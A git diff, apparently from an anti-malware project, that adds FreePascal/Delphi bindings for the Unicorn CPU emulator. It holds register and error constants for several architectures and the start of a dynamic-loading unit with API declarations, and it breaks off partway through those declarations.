100644 index 0000000..eb9fc46 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/ArmConst.pas @@ -0,0 +1,140 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit ArmConst; + +interface + +const +// ARM registers + + UC_ARM_REG_INVALID = 0; + UC_ARM_REG_APSR = 1; + UC_ARM_REG_APSR_NZCV = 2; + UC_ARM_REG_CPSR = 3; + UC_ARM_REG_FPEXC = 4; + UC_ARM_REG_FPINST = 5; + UC_ARM_REG_FPSCR = 6; + UC_ARM_REG_FPSCR_NZCV = 7; + UC_ARM_REG_FPSID = 8; + UC_ARM_REG_ITSTATE = 9; + UC_ARM_REG_LR = 10; + UC_ARM_REG_PC = 11; + UC_ARM_REG_SP = 12; + UC_ARM_REG_SPSR = 13; + UC_ARM_REG_D0 = 14; + UC_ARM_REG_D1 = 15; + UC_ARM_REG_D2 = 16; + UC_ARM_REG_D3 = 17; + UC_ARM_REG_D4 = 18; + UC_ARM_REG_D5 = 19; + UC_ARM_REG_D6 = 20; + UC_ARM_REG_D7 = 21; + UC_ARM_REG_D8 = 22; + UC_ARM_REG_D9 = 23; + UC_ARM_REG_D10 = 24; + UC_ARM_REG_D11 = 25; + UC_ARM_REG_D12 = 26; + UC_ARM_REG_D13 = 27; + UC_ARM_REG_D14 = 28; + UC_ARM_REG_D15 = 29; + UC_ARM_REG_D16 = 30; + UC_ARM_REG_D17 = 31; + UC_ARM_REG_D18 = 32; + UC_ARM_REG_D19 = 33; + UC_ARM_REG_D20 = 34; + UC_ARM_REG_D21 = 35; + UC_ARM_REG_D22 = 36; + UC_ARM_REG_D23 = 37; + UC_ARM_REG_D24 = 38; + UC_ARM_REG_D25 = 39; + UC_ARM_REG_D26 = 40; + UC_ARM_REG_D27 = 41; + UC_ARM_REG_D28 = 42; + UC_ARM_REG_D29 = 43; + UC_ARM_REG_D30 = 44; + UC_ARM_REG_D31 = 45; + UC_ARM_REG_FPINST2 = 46; + UC_ARM_REG_MVFR0 = 47; + UC_ARM_REG_MVFR1 = 48; + UC_ARM_REG_MVFR2 = 49; + UC_ARM_REG_Q0 = 50; + UC_ARM_REG_Q1 = 51; + UC_ARM_REG_Q2 = 52; + UC_ARM_REG_Q3 = 53; + UC_ARM_REG_Q4 = 54; + UC_ARM_REG_Q5 = 55; + UC_ARM_REG_Q6 = 56; + UC_ARM_REG_Q7 = 57; + UC_ARM_REG_Q8 = 58; + UC_ARM_REG_Q9 = 59; + UC_ARM_REG_Q10 = 60; + UC_ARM_REG_Q11 = 61; + UC_ARM_REG_Q12 = 62; + UC_ARM_REG_Q13 = 63; + UC_ARM_REG_Q14 = 64; + UC_ARM_REG_Q15 = 65; + UC_ARM_REG_R0 = 66; + UC_ARM_REG_R1 = 67; + UC_ARM_REG_R2 = 68; + UC_ARM_REG_R3 = 69; + UC_ARM_REG_R4 = 70; + UC_ARM_REG_R5 = 71; + UC_ARM_REG_R6 = 72; + UC_ARM_REG_R7 = 73; + UC_ARM_REG_R8 = 74; + UC_ARM_REG_R9 = 75; + UC_ARM_REG_R10 = 76; + UC_ARM_REG_R11 = 77; + UC_ARM_REG_R12 = 78; + UC_ARM_REG_S0 = 79; + UC_ARM_REG_S1 = 80; + UC_ARM_REG_S2 = 81; + UC_ARM_REG_S3 = 82; + UC_ARM_REG_S4 = 83; + UC_ARM_REG_S5 = 84; + UC_ARM_REG_S6 = 85; + UC_ARM_REG_S7 = 86; + UC_ARM_REG_S8 = 87; + UC_ARM_REG_S9 = 88; + UC_ARM_REG_S10 = 89; + UC_ARM_REG_S11 = 90; + UC_ARM_REG_S12 = 91; + UC_ARM_REG_S13 = 92; + UC_ARM_REG_S14 = 93; + UC_ARM_REG_S15 = 94; + UC_ARM_REG_S16 = 95; + UC_ARM_REG_S17 = 96; + UC_ARM_REG_S18 = 97; + UC_ARM_REG_S19 = 98; + UC_ARM_REG_S20 = 99; + UC_ARM_REG_S21 = 100; + UC_ARM_REG_S22 = 101; + UC_ARM_REG_S23 = 102; + UC_ARM_REG_S24 = 103; + UC_ARM_REG_S25 = 104; + UC_ARM_REG_S26 = 105; + UC_ARM_REG_S27 = 106; + UC_ARM_REG_S28 = 107; + UC_ARM_REG_S29 = 108; + UC_ARM_REG_S30 = 109; + UC_ARM_REG_S31 = 110; + UC_ARM_REG_C1_C0_2 = 111; + UC_ARM_REG_C13_C0_2 = 112; + UC_ARM_REG_C13_C0_3 = 113; + UC_ARM_REG_IPSR = 114; + UC_ARM_REG_MSP = 115; + UC_ARM_REG_PSP = 116; + UC_ARM_REG_CONTROL = 117; + UC_ARM_REG_ENDING = 118; + +// alias registers + UC_ARM_REG_R13 = 12; + UC_ARM_REG_R14 = 10; + UC_ARM_REG_R15 = 11; + UC_ARM_REG_SB = 75; + UC_ARM_REG_SL = 76; + UC_ARM_REG_FP = 77; + UC_ARM_REG_IP = 78; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/M68kConst.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/M68kConst.pas new file mode 100644 index 0000000..be78f78 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/M68kConst.pas @@ -0,0 +1,32 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit M68kConst; + +interface + +const +// M68K registers + + UC_M68K_REG_INVALID = 0; + UC_M68K_REG_A0 = 1; + UC_M68K_REG_A1 = 2; + UC_M68K_REG_A2 = 3; + UC_M68K_REG_A3 = 4; + UC_M68K_REG_A4 = 5; + UC_M68K_REG_A5 = 6; + UC_M68K_REG_A6 = 7; + UC_M68K_REG_A7 = 8; + UC_M68K_REG_D0 = 9; + UC_M68K_REG_D1 = 10; + UC_M68K_REG_D2 = 11; + UC_M68K_REG_D3 = 12; + UC_M68K_REG_D4 = 13; + UC_M68K_REG_D5 = 14; + UC_M68K_REG_D6 = 15; + UC_M68K_REG_D7 = 16; + UC_M68K_REG_SR = 17; + UC_M68K_REG_PC = 18; + UC_M68K_REG_ENDING = 19; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/MipsConst.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/MipsConst.pas new file mode 100644 index 0000000..b4ef27e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/MipsConst.pas @@ -0,0 +1,205 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit MipsConst; + +interface + +const +// MIPS registers + + UC_MIPS_REG_INVALID = 0; + +// General purpose registers + UC_MIPS_REG_PC = 1; + UC_MIPS_REG_0 = 2; + UC_MIPS_REG_1 = 3; + UC_MIPS_REG_2 = 4; + UC_MIPS_REG_3 = 5; + UC_MIPS_REG_4 = 6; + UC_MIPS_REG_5 = 7; + UC_MIPS_REG_6 = 8; + UC_MIPS_REG_7 = 9; + UC_MIPS_REG_8 = 10; + UC_MIPS_REG_9 = 11; + UC_MIPS_REG_10 = 12; + UC_MIPS_REG_11 = 13; + UC_MIPS_REG_12 = 14; + UC_MIPS_REG_13 = 15; + UC_MIPS_REG_14 = 16; + UC_MIPS_REG_15 = 17; + UC_MIPS_REG_16 = 18; + UC_MIPS_REG_17 = 19; + UC_MIPS_REG_18 = 20; + UC_MIPS_REG_19 = 21; + UC_MIPS_REG_20 = 22; + UC_MIPS_REG_21 = 23; + UC_MIPS_REG_22 = 24; + UC_MIPS_REG_23 = 25; + UC_MIPS_REG_24 = 26; + UC_MIPS_REG_25 = 27; + UC_MIPS_REG_26 = 28; + UC_MIPS_REG_27 = 29; + UC_MIPS_REG_28 = 30; + UC_MIPS_REG_29 = 31; + UC_MIPS_REG_30 = 32; + UC_MIPS_REG_31 = 33; + +// DSP registers + UC_MIPS_REG_DSPCCOND = 34; + UC_MIPS_REG_DSPCARRY = 35; + UC_MIPS_REG_DSPEFI = 36; + UC_MIPS_REG_DSPOUTFLAG = 37; + UC_MIPS_REG_DSPOUTFLAG16_19 = 38; + UC_MIPS_REG_DSPOUTFLAG20 = 39; + UC_MIPS_REG_DSPOUTFLAG21 = 40; + UC_MIPS_REG_DSPOUTFLAG22 = 41; + UC_MIPS_REG_DSPOUTFLAG23 = 42; + UC_MIPS_REG_DSPPOS = 43; + UC_MIPS_REG_DSPSCOUNT = 44; + +// ACC registers + UC_MIPS_REG_AC0 = 45; + UC_MIPS_REG_AC1 = 46; + UC_MIPS_REG_AC2 = 47; + UC_MIPS_REG_AC3 = 48; + +// COP registers + UC_MIPS_REG_CC0 = 49; + UC_MIPS_REG_CC1 = 50; + UC_MIPS_REG_CC2 = 51; + UC_MIPS_REG_CC3 = 52; + UC_MIPS_REG_CC4 = 53; + UC_MIPS_REG_CC5 = 54; + UC_MIPS_REG_CC6 = 55; + UC_MIPS_REG_CC7 = 56; + +// FPU registers + UC_MIPS_REG_F0 = 57; + UC_MIPS_REG_F1 = 58; + UC_MIPS_REG_F2 = 59; + UC_MIPS_REG_F3 = 60; + UC_MIPS_REG_F4 = 61; + UC_MIPS_REG_F5 = 62; + UC_MIPS_REG_F6 = 63; + UC_MIPS_REG_F7 = 64; + UC_MIPS_REG_F8 = 65; + UC_MIPS_REG_F9 = 66; + UC_MIPS_REG_F10 = 67; + UC_MIPS_REG_F11 = 68; + UC_MIPS_REG_F12 = 69; + UC_MIPS_REG_F13 = 70; + UC_MIPS_REG_F14 = 71; + UC_MIPS_REG_F15 = 72; + UC_MIPS_REG_F16 = 73; + UC_MIPS_REG_F17 = 74; + UC_MIPS_REG_F18 = 75; + UC_MIPS_REG_F19 = 76; + UC_MIPS_REG_F20 = 77; + UC_MIPS_REG_F21 = 78; + UC_MIPS_REG_F22 = 79; + UC_MIPS_REG_F23 = 80; + UC_MIPS_REG_F24 = 81; + UC_MIPS_REG_F25 = 82; + UC_MIPS_REG_F26 = 83; + UC_MIPS_REG_F27 = 84; + UC_MIPS_REG_F28 = 85; + UC_MIPS_REG_F29 = 86; + UC_MIPS_REG_F30 = 87; + UC_MIPS_REG_F31 = 88; + UC_MIPS_REG_FCC0 = 89; + UC_MIPS_REG_FCC1 = 90; + UC_MIPS_REG_FCC2 = 91; + UC_MIPS_REG_FCC3 = 92; + UC_MIPS_REG_FCC4 = 93; + UC_MIPS_REG_FCC5 = 94; + UC_MIPS_REG_FCC6 = 95; + UC_MIPS_REG_FCC7 = 96; + +// AFPR128 + UC_MIPS_REG_W0 = 97; + UC_MIPS_REG_W1 = 98; + UC_MIPS_REG_W2 = 99; + UC_MIPS_REG_W3 = 100; + UC_MIPS_REG_W4 = 101; + UC_MIPS_REG_W5 = 102; + UC_MIPS_REG_W6 = 103; + UC_MIPS_REG_W7 = 104; + UC_MIPS_REG_W8 = 105; + UC_MIPS_REG_W9 = 106; + UC_MIPS_REG_W10 = 107; + UC_MIPS_REG_W11 = 108; + UC_MIPS_REG_W12 = 109; + UC_MIPS_REG_W13 = 110; + UC_MIPS_REG_W14 = 111; + UC_MIPS_REG_W15 = 112; + UC_MIPS_REG_W16 = 113; + UC_MIPS_REG_W17 = 114; + UC_MIPS_REG_W18 = 115; + UC_MIPS_REG_W19 = 116; + UC_MIPS_REG_W20 = 117; + UC_MIPS_REG_W21 = 118; + UC_MIPS_REG_W22 = 119; + UC_MIPS_REG_W23 = 120; + UC_MIPS_REG_W24 = 121; + UC_MIPS_REG_W25 = 122; + UC_MIPS_REG_W26 = 123; + UC_MIPS_REG_W27 = 124; + UC_MIPS_REG_W28 = 125; + UC_MIPS_REG_W29 = 126; + UC_MIPS_REG_W30 = 127; + UC_MIPS_REG_W31 = 128; + UC_MIPS_REG_HI = 129; + UC_MIPS_REG_LO = 130; + UC_MIPS_REG_P0 = 131; + UC_MIPS_REG_P1 = 132; + UC_MIPS_REG_P2 = 133; + UC_MIPS_REG_MPL0 = 134; + UC_MIPS_REG_MPL1 = 135; + UC_MIPS_REG_MPL2 = 136; + UC_MIPS_REG_CP0_CONFIG3 = 137; + UC_MIPS_REG_CP0_USERLOCAL = 138; + UC_MIPS_REG_ENDING = 139; + UC_MIPS_REG_ZERO = 2; + UC_MIPS_REG_AT = 3; + UC_MIPS_REG_V0 = 4; + UC_MIPS_REG_V1 = 5; + UC_MIPS_REG_A0 = 6; + UC_MIPS_REG_A1 = 7; + UC_MIPS_REG_A2 = 8; + UC_MIPS_REG_A3 = 9; + UC_MIPS_REG_T0 = 10; + UC_MIPS_REG_T1 = 11; + UC_MIPS_REG_T2 = 12; + UC_MIPS_REG_T3 = 13; + UC_MIPS_REG_T4 = 14; + UC_MIPS_REG_T5 = 15; + UC_MIPS_REG_T6 = 16; + UC_MIPS_REG_T7 = 17; + UC_MIPS_REG_S0 = 18; + UC_MIPS_REG_S1 = 19; + UC_MIPS_REG_S2 = 20; + UC_MIPS_REG_S3 = 21; + UC_MIPS_REG_S4 = 22; + UC_MIPS_REG_S5 = 23; + UC_MIPS_REG_S6 = 24; + UC_MIPS_REG_S7 = 25; + UC_MIPS_REG_T8 = 26; + UC_MIPS_REG_T9 = 27; + UC_MIPS_REG_K0 = 28; + UC_MIPS_REG_K1 = 29; + UC_MIPS_REG_GP = 30; + UC_MIPS_REG_SP = 31; + UC_MIPS_REG_FP = 32; + UC_MIPS_REG_S8 = 32; + UC_MIPS_REG_RA = 33; + UC_MIPS_REG_HI0 = 45; + UC_MIPS_REG_HI1 = 46; + UC_MIPS_REG_HI2 = 47; + UC_MIPS_REG_HI3 = 48; + UC_MIPS_REG_LO0 = 45; + UC_MIPS_REG_LO1 = 46; + UC_MIPS_REG_LO2 = 47; + UC_MIPS_REG_LO3 = 48; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/SparcConst.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/SparcConst.pas new file mode 100644 index 0000000..32ed301 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/SparcConst.pas @@ -0,0 +1,104 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit SparcConst; + +interface + +const +// SPARC registers + + UC_SPARC_REG_INVALID = 0; + UC_SPARC_REG_F0 = 1; + UC_SPARC_REG_F1 = 2; + UC_SPARC_REG_F2 = 3; + UC_SPARC_REG_F3 = 4; + UC_SPARC_REG_F4 = 5; + UC_SPARC_REG_F5 = 6; + UC_SPARC_REG_F6 = 7; + UC_SPARC_REG_F7 = 8; + UC_SPARC_REG_F8 = 9; + UC_SPARC_REG_F9 = 10; + UC_SPARC_REG_F10 = 11; + UC_SPARC_REG_F11 = 12; + UC_SPARC_REG_F12 = 13; + UC_SPARC_REG_F13 = 14; + UC_SPARC_REG_F14 = 15; + UC_SPARC_REG_F15 = 16; + UC_SPARC_REG_F16 = 17; + UC_SPARC_REG_F17 = 18; + UC_SPARC_REG_F18 = 19; + UC_SPARC_REG_F19 = 20; + UC_SPARC_REG_F20 = 21; + UC_SPARC_REG_F21 = 22; + UC_SPARC_REG_F22 = 23; + UC_SPARC_REG_F23 = 24; + UC_SPARC_REG_F24 = 25; + UC_SPARC_REG_F25 = 26; + UC_SPARC_REG_F26 = 27; + UC_SPARC_REG_F27 = 28; + UC_SPARC_REG_F28 = 29; + UC_SPARC_REG_F29 = 30; + UC_SPARC_REG_F30 = 31; + UC_SPARC_REG_F31 = 32; + UC_SPARC_REG_F32 = 33; + UC_SPARC_REG_F34 = 34; + UC_SPARC_REG_F36 = 35; + UC_SPARC_REG_F38 = 36; + UC_SPARC_REG_F40 = 37; + UC_SPARC_REG_F42 = 38; + UC_SPARC_REG_F44 = 39; + UC_SPARC_REG_F46 = 40; + UC_SPARC_REG_F48 = 41; + UC_SPARC_REG_F50 = 42; + UC_SPARC_REG_F52 = 43; + UC_SPARC_REG_F54 = 44; + UC_SPARC_REG_F56 = 45; + UC_SPARC_REG_F58 = 46; + UC_SPARC_REG_F60 = 47; + UC_SPARC_REG_F62 = 48; + UC_SPARC_REG_FCC0 = 49; + UC_SPARC_REG_FCC1 = 50; + UC_SPARC_REG_FCC2 = 51; + UC_SPARC_REG_FCC3 = 52; + UC_SPARC_REG_G0 = 53; + UC_SPARC_REG_G1 = 54; + UC_SPARC_REG_G2 = 55; + UC_SPARC_REG_G3 = 56; + UC_SPARC_REG_G4 = 57; + UC_SPARC_REG_G5 = 58; + UC_SPARC_REG_G6 = 59; + UC_SPARC_REG_G7 = 60; + UC_SPARC_REG_I0 = 61; + UC_SPARC_REG_I1 = 62; + UC_SPARC_REG_I2 = 63; + UC_SPARC_REG_I3 = 64; + UC_SPARC_REG_I4 = 65; + UC_SPARC_REG_I5 = 66; + UC_SPARC_REG_FP = 67; + UC_SPARC_REG_I7 = 68; + UC_SPARC_REG_ICC = 69; + UC_SPARC_REG_L0 = 70; + UC_SPARC_REG_L1 = 71; + UC_SPARC_REG_L2 = 72; + UC_SPARC_REG_L3 = 73; + UC_SPARC_REG_L4 = 74; + UC_SPARC_REG_L5 = 75; + UC_SPARC_REG_L6 = 76; + UC_SPARC_REG_L7 = 77; + UC_SPARC_REG_O0 = 78; + UC_SPARC_REG_O1 = 79; + UC_SPARC_REG_O2 = 80; + UC_SPARC_REG_O3 = 81; + UC_SPARC_REG_O4 = 82; + UC_SPARC_REG_O5 = 83; + UC_SPARC_REG_SP = 84; + UC_SPARC_REG_O7 = 85; + UC_SPARC_REG_Y = 86; + UC_SPARC_REG_XCC = 87; + UC_SPARC_REG_PC = 88; + UC_SPARC_REG_ENDING = 89; + UC_SPARC_REG_O6 = 84; + UC_SPARC_REG_I6 = 67; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/UnicornConst.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/UnicornConst.pas new file mode 100644 index 0000000..7337543 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/UnicornConst.pas @@ -0,0 +1,116 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit UnicornConst; + +interface + +const UC_API_MAJOR = 1; + + UC_API_MINOR = 0; + UC_VERSION_MAJOR = 1; + + UC_VERSION_MINOR = 0; + UC_VERSION_EXTRA = 2; + UC_SECOND_SCALE = 1000000; + UC_MILISECOND_SCALE = 1000; + UC_ARCH_ARM = 1; + UC_ARCH_ARM64 = 2; + UC_ARCH_MIPS = 3; + UC_ARCH_X86 = 4; + UC_ARCH_PPC = 5; + UC_ARCH_SPARC = 6; + UC_ARCH_M68K = 7; + UC_ARCH_MAX = 8; + + UC_MODE_LITTLE_ENDIAN = 0; + UC_MODE_BIG_ENDIAN = 1073741824; + + UC_MODE_ARM = 0; + UC_MODE_THUMB = 16; + UC_MODE_MCLASS = 32; + UC_MODE_V8 = 64; + UC_MODE_ARM926 = 128; + UC_MODE_ARM946 = 256; + UC_MODE_ARM1176 = 512; + UC_MODE_MICRO = 16; + UC_MODE_MIPS3 = 32; + UC_MODE_MIPS32R6 = 64; + UC_MODE_MIPS32 = 4; + UC_MODE_MIPS64 = 8; + UC_MODE_16 = 2; + UC_MODE_32 = 4; + UC_MODE_64 = 8; + UC_MODE_PPC32 = 4; + UC_MODE_PPC64 = 8; + UC_MODE_QPX = 16; + UC_MODE_SPARC32 = 4; + UC_MODE_SPARC64 = 8; + UC_MODE_V9 = 16; + + UC_ERR_OK = 0; + UC_ERR_NOMEM = 1; + UC_ERR_ARCH = 2; + UC_ERR_HANDLE = 3; + UC_ERR_MODE = 4; + UC_ERR_VERSION = 5; + UC_ERR_READ_UNMAPPED = 6; + UC_ERR_WRITE_UNMAPPED = 7; + UC_ERR_FETCH_UNMAPPED = 8; + UC_ERR_HOOK = 9; + UC_ERR_INSN_INVALID = 10; + UC_ERR_MAP = 11; + UC_ERR_WRITE_PROT = 12; + UC_ERR_READ_PROT = 13; + UC_ERR_FETCH_PROT = 14; + UC_ERR_ARG = 15; + UC_ERR_READ_UNALIGNED = 16; + UC_ERR_WRITE_UNALIGNED = 17; + UC_ERR_FETCH_UNALIGNED = 18; + UC_ERR_HOOK_EXIST = 19; + UC_ERR_RESOURCE = 20; + UC_ERR_EXCEPTION = 21; + UC_MEM_READ = 16; + UC_MEM_WRITE = 17; + UC_MEM_FETCH = 18; + UC_MEM_READ_UNMAPPED = 19; + UC_MEM_WRITE_UNMAPPED = 20; + UC_MEM_FETCH_UNMAPPED = 21; + UC_MEM_WRITE_PROT = 22; + UC_MEM_READ_PROT = 23; + UC_MEM_FETCH_PROT = 24; + UC_MEM_READ_AFTER = 25; + UC_HOOK_INTR = 1; + UC_HOOK_INSN = 2; + UC_HOOK_CODE = 4; + UC_HOOK_BLOCK = 8; + UC_HOOK_MEM_READ_UNMAPPED = 16; + UC_HOOK_MEM_WRITE_UNMAPPED = 32; + UC_HOOK_MEM_FETCH_UNMAPPED = 64; + UC_HOOK_MEM_READ_PROT = 128; + UC_HOOK_MEM_WRITE_PROT = 256; + UC_HOOK_MEM_FETCH_PROT = 512; + UC_HOOK_MEM_READ = 1024; + UC_HOOK_MEM_WRITE = 2048; + UC_HOOK_MEM_FETCH = 4096; + UC_HOOK_MEM_READ_AFTER = 8192; + UC_HOOK_INSN_INVALID = 16384; + UC_HOOK_MEM_UNMAPPED = 112; + UC_HOOK_MEM_PROT = 896; + UC_HOOK_MEM_READ_INVALID = 144; + UC_HOOK_MEM_WRITE_INVALID = 288; + UC_HOOK_MEM_FETCH_INVALID = 576; + UC_HOOK_MEM_INVALID = 1008; + UC_HOOK_MEM_VALID = 7168; + UC_QUERY_MODE = 1; + UC_QUERY_PAGE_SIZE = 2; + UC_QUERY_ARCH = 3; + UC_QUERY_TIMEOUT = 4; + + UC_PROT_NONE = 0; + UC_PROT_READ = 1; + UC_PROT_WRITE = 2; + UC_PROT_EXEC = 4; + UC_PROT_ALL = 7; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Unicorn_dyn.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Unicorn_dyn.pas new file mode 100644 index 0000000..427813c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Unicorn_dyn.pas @@ -0,0 +1,673 @@ +{ + FreePascal/Delphi bindings for the UnicornEngine Emulator Engine \ + Tested On Mac - Win - Linux >> with FreePascal v3.0.4 & Delphi Berlin 10.2 . + + Copyright(c) 2018 Coldzer0 <Coldzer0 [at] protonmail.ch> . + + License: GPLv2 . +} + +unit Unicorn_dyn; + +{$IFDEF FPC} + {$MODE Delphi} + {$PackRecords C} +{$ENDIF} + +interface + +uses + {$IFDEF FPC}dynlibs,Crt{$ELSE} + {$ifdef mswindows} + windows,sysutils + {$ENDIF} + {$ENDIF}; + + +const +{$IFDEF Darwin} + UNICORN_LIB = './libunicorn.dylib'; +{$ENDIF} +{$ifdef Linux} + UNICORN_LIB = './libunicorn.so'; +{$endif} +{$ifdef mswindows} + UNICORN_LIB = './unicorn.dll'; +{$endif} + +type + uc_engine = Pointer; + uc_context = Pointer; // Opaque storage for CPU context, used with uc_context_*() + uc_hook = UIntPtr; + uc_arch = Cardinal; + uc_mode = Cardinal; + uc_err = Cardinal; + uc_query_type = Cardinal; + + {$IFNDEF FPC} // Delphi Support . + PUInt32 = ^UInt32; + {$ENDIF} + +type + { + Callback functions + Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) + @address: address where the code is being executed + @size: size of machine instruction(s) being executed, or 0 when size is unknown + @user_data: user data passed to tracing APIs. + } + uc_cb_hookcode_t = procedure(uc : uc_engine; address : UInt64; size : UInt32; user_data : Pointer); cdecl; + + { + Callback function for tracing interrupts (for uc_hook_intr()) + @intno: interrupt number + @user_data: user data passed to tracing APIs. + } + uc_cb_hookintr_t = procedure(uc : uc_engine; intno : UInt32; user_data : Pointer); cdecl; + + { + Callback function for tracing IN instruction of X86 + @port: port number + @size: data size (1/2/4) to be read from this port + @user_data: user data passed to tracing APIs. + } + uc_cb_insn_in_t = function(uc : uc_engine; port : UInt32; siz : integer; user_data : Pointer) : UInt32; cdecl; + + { + Callback function for OUT instruction of X86 . + @port: port number + @size: data size (1/2/4) to be written to this port + @value: data value to be written to this port + } + uc_cb_insn_out_t = procedure(uc : uc_engine; port : UInt32; size : integer; value : UInt32; user_data : Pointer); cdecl; + + // All type of memory accesses for UC_HOOK_MEM_* + uc_mem_type = integer; + + // All type of hooks for uc_hook_add() API. + uc_hook_type = integer; + + { + Callback function for hooking memory (UC_MEM_READ, UC_MEM_WRITE & UC_MEM_FETCH) + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. + @user_data: user data passed to tracing APIs + } + uc_cb_hookmem_t = procedure(uc : uc_engine; _type : uc_mem_type; address : UInt64; size : integer; value : Int64; user_data : Pointer); cdecl; + + { + Callback function for handling invalid memory access events (UNMAPPED and + PROT events) + + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. + @user_data: user data passed to tracing APIs + + @return: return true to continue, or false to stop program (due to invalid memory). + NOTE: returning true to continue execution will only work if the accessed + memory is made accessible with the correct permissions during the hook. + + In the event of a UC_MEM_READ_UNMAPPED or UC_MEM_WRITE_UNMAPPED callback, + the memory should be uc_mem_map()-ed with the correct permissions, and the + instruction will then read or write to the address as it was supposed to. + + In the event of a UC_MEM_FETCH_UNMAPPED callback, the memory can be mapped + in as executable, in which case execution will resume from the fetched address. + The instruction pointer may be written to in order to change where execution resumes, + but the fetch must succeed if execution is to resume. + } + uc_cb_eventmem_t = function(uc : uc_engine; _type : uc_mem_type; address : UInt64; size : integer; value : Int64; user_data : Pointer) : LongBool; cdecl; + + +type + { + Memory region mapped by uc_mem_map() and uc_mem_map_ptr() + Retrieve the list of memory regions with uc_mem_regions() + } + uc_mem_region = record + rBegin : UInt64; // begin address of the region (inclusive) + rEnd : UInt64; // end address of the region (inclusive) + rPerms : UInt32; // memory permissions of the region + end; + uc_mem_regionArray = array[0..(MaxInt div SizeOf(uc_mem_region))-1] of uc_mem_region; + Puc_mem_regionArray = ^uc_mem_regionArray; + + +// Exports +var +(* + Return combined API version & major and minor version numbers. + + @major: major number of API version + @minor: minor number of API version + + @return hexical number as (major << 8 | minor), which encodes both + major & minor versions. + NOTE: This returned value can be compared with version number made + with macro UC_MAKE_VERSION . + + For example, second API version would return 1 in @major, and 1 in @minor + The return value would be 0x0101 + + NOTE: if you only care about returned value, but not major and minor values, + set both @major & @minor arguments to NULL. +*) + uc_version : function (var major, minor : Cardinal) : Cardinal; cdecl; + +(* + Determine if the given architecture is supported by this library. + + @arch: architecture type (UC_ARCH_* ) + + @return True if this library supports the given arch. +*) + uc_arch_supported : function (arch : uc_arch) : LongBool; cdecl; + +(* + Create new instance of unicorn engine. + + @arch: architecture type (UC_ARCH_* ) + @mode: hardware mode. This is combined of UC_MODE_* + @uc: pointer to uc_engine, which will be updated at return time + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_open : function (arch : uc_arch; mode : uc_mode; var uc : uc_engine) : uc_err; cdecl; + +(* + Close UC instance: MUST do to release the handle when it is not used anymore. + NOTE: this must be called only when there is no longer usage of Unicorn. + The reason is the this API releases some cached memory, thus access to any + Unicorn API after uc_close() might crash your application. + After this, @uc is invalid, and nolonger usable. + + @uc: pointer to a handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_close : function (uc : uc_engine) : uc_err; cdecl; + +(* + Query internal status of engine. + + @uc: handle returned by uc_open() + @type: query type. See uc_query_type + + @result: save the internal status queried . + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*) + uc_query : function (uc : uc_engine; qtype : uc_query_type; result : PCardinal) : uc_err ; cdecl; + + +(* + Report the last error number when some API function fail. + Like glibc's errno, uc_errno might not retain its old value once accessed. + + @uc: handle returned by uc_open() + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*) + uc_errno : function (uc : uc_engine) : uc_err; cdecl; + +(* + Return a string describing given error code. + + @code: error code (see UC_ERR_* ) + + @return: returns a pointer to a string that describes the error code + passed in the argument @code +*) + uc_strerror : function (code : uc_err) : PAnsiChar; cdecl; + +(* + Write to register. + + @uc: handle returned by uc_open() + @regid: register ID that is to be modified. + @value: pointer to the value that will set to register @regid . + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_reg_write : function (uc : uc_engine; regid : Integer; const value : Pointer) : uc_err; cdecl; + +(* + Read register value. + + @uc: handle returned by uc_open() + @regid: register ID that is to be retrieved. + @value: pointer to a variable storing the register value. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_reg_read: function (uc : uc_engine; regid : Integer; value : Pointer) : uc_err; cdecl ; + + +(* + Write multiple register values. + + @uc: handle returned by uc_open() + @rges: array of register IDs to store + @value: pointer to array of register values + @count: length of both *regs and *vals + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_reg_write_batch : function(uc : uc_engine; regs : PIntegerArray; const values : Pointer; count : Integer) : uc_err; cdecl; + +(* + Read multiple register values. + + @uc: handle returned by uc_open() + @rges: array of register IDs to retrieve + @value: pointer to array of values to hold registers + @count: length of both *regs and *vals + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_reg_read_batch : 